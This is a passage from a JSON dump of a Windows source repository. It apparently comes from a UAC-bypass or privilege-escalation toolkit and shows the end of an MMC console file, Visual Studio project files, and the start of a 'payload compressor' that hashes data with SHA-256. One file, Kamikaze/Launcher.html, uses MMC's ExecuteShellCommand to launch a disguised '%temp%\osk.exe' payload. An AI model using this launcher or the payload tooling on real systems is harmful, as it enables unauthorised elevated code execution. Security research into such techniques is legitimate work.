AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAACL0+7/yfn//4/j//+P5P//kOX//5Dl//+P5f//j+X//4/k//+P4///juP//47i\n//+P4///j+P//4/k//+P4///j+P//4/j//+O4///juL//43h//+N4f//juH//4/i//+P4///j+T/\n/4fX8P9gnbr/AAAAKgAAAA4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAIvT7v/M+v//keX//5Hm//+R5///kef//5Hn//+R5///kef//5Hn//+Q5f//kOP/\n/4/i//+P4v//j+P//4/l//+99v//u/X//7bz//+s8P//qO7//6ju//+o7v//qO7//6ju//+o7v//\nY6nG/3m61P8AAAAqAAAADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAdb7e/877//+Q5v//kej//5Lo//+S6P//kej//5Ho//+S5///kuf//5Ln//+Q5f//\nj+P//4/i//+P4///tvP//4HL5v9NiaP/UIyn/1OQqv9XlK//YZ+5/2elv/9sqsT/bq3H/26tx/90\nweL/ebrU/wAAACoAAAAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAACL0+7/db7e/7z2//+89f//u/X//7r1//+49P//t/T//7fz//+28///tvP//7bz//+2\n8///tvP//7bz//9st9f/YJ26/26yz/90weL/dMHi/3TB4v90weL/dMHi/3TB4v90weL/dMHi/3TB\n4v95utT/AAAAJQAAAAsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAA
\n    </Binary>\n    <Binary>\nAQAAABQAAAAAAAAABAAAAP////8=\n    </Binary>\n  </BinaryStorage>\n</MMC_ConsoleFile>"
  },
  {
    "path": "Source/Kamikaze/Launcher.html",
    "content": "<html><body><script>external.ExecuteShellCommand(\"%temp%\\\\osk.exe\",\"%systemdrive%\",\"\",\"Restored\");</script></body></html>"
  },
  {
    "path": "Source/Naka/Naka.vcxproj",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" ToolsVersion=\"15.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup Label=\"ProjectConfigurations\">\n    <ProjectConfiguration Include=\"Debug|Win32\">\n      <Configuration>Debug</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"ReleaseInternal|Win32\">\n      <Configuration>ReleaseInternal</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"ReleaseInternal|x64\">\n      <Configuration>ReleaseInternal</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|Win32\">\n      <Configuration>Release</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Debug|x64\">\n      <Configuration>Debug</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|x64\">\n      <Configuration>Release</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n  </ItemGroup>\n  <PropertyGroup Label=\"Globals\">\n    <ProjectGuid>{3BEF8A16-981F-4C65-8AE7-C612B46BE446}</ProjectGuid>\n    <Keyword>Win32Proj</Keyword>\n    <RootNamespace>Naka</RootNamespace>\n    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.Default.props\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v145</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\" 
Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v145</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternal|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v145</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v145</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n    <SpectreMitigation>false</SpectreMitigation>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v145</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n    <SpectreMitigation>false</SpectreMitigation>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternal|x64'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v145</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n    <SpectreMitigation>false</SpectreMitigation>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.props\" />\n  <ImportGroup 
Label=\"ExtensionSettings\">\n  </ImportGroup>\n  <ImportGroup Label=\"Shared\">\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternal|Win32'\" Label=\"PropertySheets\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternal|x64'\" Label=\"PropertySheets\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <PropertyGroup 
Label=\"UserMacros\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <LinkIncremental>true</LinkIncremental>\n    <OutDir>.\\output\\$(Platform)\\$(Configuration)\\</OutDir>\n    <IntDir>.\\output\\$(Platform)\\$(Configuration)\\</IntDir>\n    <TargetName>$(ProjectName)32</TargetName>\n    <CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <LinkIncremental>true</LinkIncremental>\n    <OutDir>.\\output\\$(Platform)\\$(Configuration)\\</OutDir>\n    <IntDir>.\\output\\$(Platform)\\$(Configuration)\\</IntDir>\n    <TargetName>$(ProjectName)64</TargetName>\n    <CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <LinkIncremental>false</LinkIncremental>\n    <OutDir>.\\output\\$(Platform)\\$(Configuration)\\</OutDir>\n    <IntDir>.\\output\\$(Platform)\\$(Configuration)\\</IntDir>\n    <TargetName>$(ProjectName)32</TargetName>\n    <CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternal|Win32'\">\n    <LinkIncremental>false</LinkIncremental>\n    <OutDir>.\\output\\$(Platform)\\$(Configuration)\\</OutDir>\n    <IntDir>.\\output\\$(Platform)\\$(Configuration)\\</IntDir>\n    <TargetName>$(ProjectName)32</TargetName>\n    <CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <LinkIncremental>false</LinkIncremental>\n    <OutDir>.\\output\\$(Platform)\\$(Configuration)\\</OutDir>\n    <IntDir>.\\output\\$(Platform)\\$(Configuration)\\</IntDir>\n    <TargetName>$(ProjectName)64</TargetName>\n    <CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>\n  </PropertyGroup>\n  <PropertyGroup 
Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternal|x64'\">\n    <LinkIncremental>false</LinkIncremental>\n    <OutDir>.\\output\\$(Platform)\\$(Configuration)\\</OutDir>\n    <IntDir>.\\output\\$(Platform)\\$(Configuration)\\</IntDir>\n    <TargetName>$(ProjectName)64</TargetName>\n    <CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>\n  </PropertyGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <ClCompile>\n      <PrecompiledHeader>\n      </PrecompiledHeader>\n      <WarningLevel>Level4</WarningLevel>\n      <Optimization>Disabled</Optimization>\n      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <SDLCheck>true</SDLCheck>\n      <AdditionalIncludeDirectories>$(SolutionDir)</AdditionalIncludeDirectories>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <EntryPointSymbol>main</EntryPointSymbol>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <ClCompile>\n      <PrecompiledHeader>\n      </PrecompiledHeader>\n      <WarningLevel>Level4</WarningLevel>\n      <Optimization>Disabled</Optimization>\n      <PreprocessorDefinitions>_DEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <SDLCheck>true</SDLCheck>\n      <AdditionalIncludeDirectories>$(ProjectDir);$(SolutionDir)</AdditionalIncludeDirectories>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <EntryPointSymbol>main</EntryPointSymbol>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <ClCompile>\n      <WarningLevel>Level4</WarningLevel>\n      <PrecompiledHeader>\n      </PrecompiledHeader>\n      
<Optimization>MaxSpeed</Optimization>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <SDLCheck>true</SDLCheck>\n      <CompileAs>CompileAsC</CompileAs>\n      <AdditionalIncludeDirectories>$(SolutionDir)</AdditionalIncludeDirectories>\n      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n      <GenerateDebugInformation>false</GenerateDebugInformation>\n      <SetChecksum>true</SetChecksum>\n      <EntryPointSymbol>main</EntryPointSymbol>\n    </Link>\n    <PostBuildEvent>\n      <Command>\n      </Command>\n    </PostBuildEvent>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternal|Win32'\">\n    <ClCompile>\n      <WarningLevel>Level4</WarningLevel>\n      <PrecompiledHeader>\n      </PrecompiledHeader>\n      <Optimization>MaxSpeed</Optimization>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <SDLCheck>true</SDLCheck>\n      <CompileAs>CompileAsC</CompileAs>\n      <AdditionalIncludeDirectories>$(SolutionDir)</AdditionalIncludeDirectories>\n      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n      <GenerateDebugInformation>false</GenerateDebugInformation>\n      <SetChecksum>true</SetChecksum>\n      <EntryPointSymbol>main</EntryPointSymbol>\n    </Link>\n    <PostBuildEvent>\n      
<Command>\\Utils\\StripDebug.exe .\\output\\$(Platform)\\$(Configuration)\\$(ProjectName)32.exe</Command>\n    </PostBuildEvent>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <ClCompile>\n      <WarningLevel>Level4</WarningLevel>\n      <PrecompiledHeader>\n      </PrecompiledHeader>\n      <Optimization>MaxSpeed</Optimization>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <PreprocessorDefinitions>NDEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <SDLCheck>true</SDLCheck>\n      <CompileAs>CompileAsC</CompileAs>\n      <AdditionalIncludeDirectories>$(ProjectDir);$(SolutionDir)</AdditionalIncludeDirectories>\n      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>\n      <StringPooling>true</StringPooling>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n      <GenerateDebugInformation>false</GenerateDebugInformation>\n      <SetChecksum>true</SetChecksum>\n      <EntryPointSymbol>main</EntryPointSymbol>\n    </Link>\n    <PostBuildEvent>\n      <Command>\n      </Command>\n    </PostBuildEvent>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternal|x64'\">\n    <ClCompile>\n      <WarningLevel>Level4</WarningLevel>\n      <PrecompiledHeader>\n      </PrecompiledHeader>\n      <Optimization>MaxSpeed</Optimization>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <PreprocessorDefinitions>NDEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <SDLCheck>true</SDLCheck>\n      <CompileAs>CompileAsC</CompileAs>\n      <AdditionalIncludeDirectories>$(ProjectDir);$(SolutionDir)</AdditionalIncludeDirectories>\n      
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>\n      <StringPooling>true</StringPooling>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n      <GenerateDebugInformation>false</GenerateDebugInformation>\n      <SetChecksum>true</SetChecksum>\n      <EntryPointSymbol>main</EntryPointSymbol>\n    </Link>\n    <PostBuildEvent>\n      <Command>\\Utils\\StripDebug.exe .\\output\\$(Platform)\\$(Configuration)\\$(ProjectName)64.exe</Command>\n    </PostBuildEvent>\n  </ItemDefinitionGroup>\n  <ItemGroup>\n    <ClCompile Include=\"..\\Shared\\strtoul.c\" />\n    <ClCompile Include=\"..\\Shared\\_filename.c\" />\n    <ClCompile Include=\"..\\Shared\\_strcat.c\" />\n    <ClCompile Include=\"..\\Shared\\_strcmpi.c\" />\n    <ClCompile Include=\"..\\Shared\\_strcpy.c\" />\n    <ClCompile Include=\"..\\Shared\\_strend.c\" />\n    <ClCompile Include=\"..\\Shared\\_strlen.c\" />\n    <ClCompile Include=\"main.c\" />\n  </ItemGroup>\n  <ItemGroup>\n    <ClInclude Include=\"..\\Shared\\minirtl.h\" />\n    <ClInclude Include=\"..\\Shared\\rtltypes.h\" />\n    <ClInclude Include=\"..\\Shared\\_filename.h\" />\n    <ClInclude Include=\"naka.h\" />\n  </ItemGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.targets\" />\n  <ImportGroup Label=\"ExtensionTargets\">\n  </ImportGroup>\n</Project>"
  },
  {
    "path": "Source/Naka/Naka.vcxproj.filters",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup>\n    <Filter Include=\"Source Files\">\n      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>\n      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>\n    </Filter>\n    <Filter Include=\"Header Files\">\n      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>\n      <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>\n    </Filter>\n    <Filter Include=\"Resource Files\">\n      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>\n      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>\n    </Filter>\n    <Filter Include=\"minirtl\">\n      <UniqueIdentifier>{13402ae7-3472-4b63-b943-cade7851a002}</UniqueIdentifier>\n    </Filter>\n  </ItemGroup>\n  <ItemGroup>\n    <ClCompile Include=\"main.c\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\_filename.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\_strcat.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\_strcpy.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\_strend.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\_strlen.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\strtoul.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\_strcmpi.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n  </ItemGroup>\n  <ItemGroup>\n    <ClInclude Include=\"..\\Shared\\minirtl.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\Shared\\_filename.h\">\n      
<Filter>minirtl</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\Shared\\rtltypes.h\">\n      <Filter>minirtl</Filter>\n    </ClInclude>\n    <ClInclude Include=\"naka.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n  </ItemGroup>\n</Project>"
  },
  {
    "path": "Source/Naka/Naka.vcxproj.user",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"14.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <LocalDebuggerCommandArguments>--stable</LocalDebuggerCommandArguments>\n    <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <LocalDebuggerCommandArguments>--stable</LocalDebuggerCommandArguments>\n    <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternal|x64'\">\n    <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternal|Win32'\">\n    <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>\n  </PropertyGroup>\n</Project>"
  },
  {
    "path": "Source/Naka/main.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2016 - 2025\n*\n*  TITLE:       MAIN.C\n*\n*  VERSION:     3.69\n*\n*  DATE:        07 Jul 2025\n*\n*  Naka, support payload compressor.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#include \"naka.h\"\n\n/*\n* CreateSha256HashForBuffer\n*\n* Purpose:\n*\n* Return SHA256 hash for buffer.\n*\n*/\nBOOL CreateSha256HashForBuffer(\n    _In_ PBYTE pbBuffer,\n    _In_ DWORD cbBuffer,\n    _Out_ PBYTE *pbHash,\n    _Out_ PDWORD pcbHash\n)\n{\n    BCRYPT_ALG_HANDLE   hAlgSha256 = NULL, hHashSha256 = NULL;\n    BOOL                bResult = FALSE;\n\n    DWORD cbKeyObject = 0, cbResult = 0;\n\n    PBYTE pbKeyObject = NULL;\n    HANDLE hHeap = GetProcessHeap();\n\n    PBYTE _pbHash = NULL;\n    DWORD _cbHash = 0;\n\n    do {\n        if (!NT_SUCCESS(BCryptOpenAlgorithmProvider(\n            &hAlgSha256,\n            BCRYPT_SHA256_ALGORITHM,\n            NULL, 0)))\n        {\n            break;\n        }\n\n        //\n        // CNG object allocation.\n        //\n\n        if (!NT_SUCCESS(BCryptGetProperty(\n            hAlgSha256,\n            BCRYPT_OBJECT_LENGTH,\n            (PUCHAR)&cbKeyObject,\n            sizeof(DWORD),\n            &cbResult,\n            0)))\n        {\n            break;\n        }\n\n        pbKeyObject = (PBYTE)HeapAlloc(\n            hHeap,\n            HEAP_ZERO_MEMORY,\n            cbKeyObject);\n\n        if (pbKeyObject == NULL)\n            break;\n\n        //\n        // Hash buffer allocation.\n        //\n\n        cbResult = 0;\n        if (!NT_SUCCESS(BCryptGetProperty(\n            hAlgSha256,\n            BCRYPT_HASH_LENGTH,\n      
      (PUCHAR)&_cbHash,\n            sizeof(DWORD),\n            &cbResult, 0)))\n        {\n            break;\n        }\n\n        _pbHash = (PBYTE)HeapAlloc(\n            hHeap,\n            HEAP_ZERO_MEMORY,\n            _cbHash);\n\n        if (_pbHash == NULL)\n            break;\n\n        //\n        // Create hash from buffer.\n        //\n\n        if (!NT_SUCCESS(BCryptCreateHash(\n            hAlgSha256,\n            &hHashSha256,\n            pbKeyObject,\n            cbKeyObject,\n            NULL,\n            0,\n            0)))\n        {\n            break;\n        }\n\n        if (!NT_SUCCESS(BCryptHashData(\n            hHashSha256,\n            (PUCHAR)pbBuffer,\n            (ULONG)cbBuffer,\n            0)))\n        {\n            break;\n        }\n\n        if (!NT_SUCCESS(BCryptFinishHash(\n            hHashSha256,\n            _pbHash,\n            _cbHash,\n            0)))\n        {\n            break;\n        }\n\n        BCryptDestroyHash(hHashSha256);\n        hHashSha256 = NULL;\n\n        BCryptCloseAlgorithmProvider(hAlgSha256, 0);\n        hAlgSha256 = NULL;\n\n        HeapFree(hHeap, 0, pbKeyObject);\n        pbKeyObject = NULL;\n\n        *pbHash = _pbHash;\n        *pcbHash = 